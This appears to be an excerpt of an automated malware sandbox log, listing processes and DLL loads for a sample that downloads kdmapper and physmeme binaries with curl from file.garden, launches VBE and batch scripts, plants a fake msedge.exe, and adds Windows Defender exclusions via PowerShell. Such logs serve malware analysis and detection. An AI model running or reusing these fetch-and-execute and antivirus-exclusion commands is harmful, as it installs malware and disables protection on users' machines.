Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Idle.exe C:\Users\user\AppData\Local\Idle.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Idle.exe C:\Users\user\AppData\Local\Idle.exe
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Users\user\AppData\Local\Idle.exe "C:\Users\user\AppData\Local\Idle.exe"
Source: C:\Users\user\AppData\Local\Idle.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
Source: C:\Edge\msedge.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Idle.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
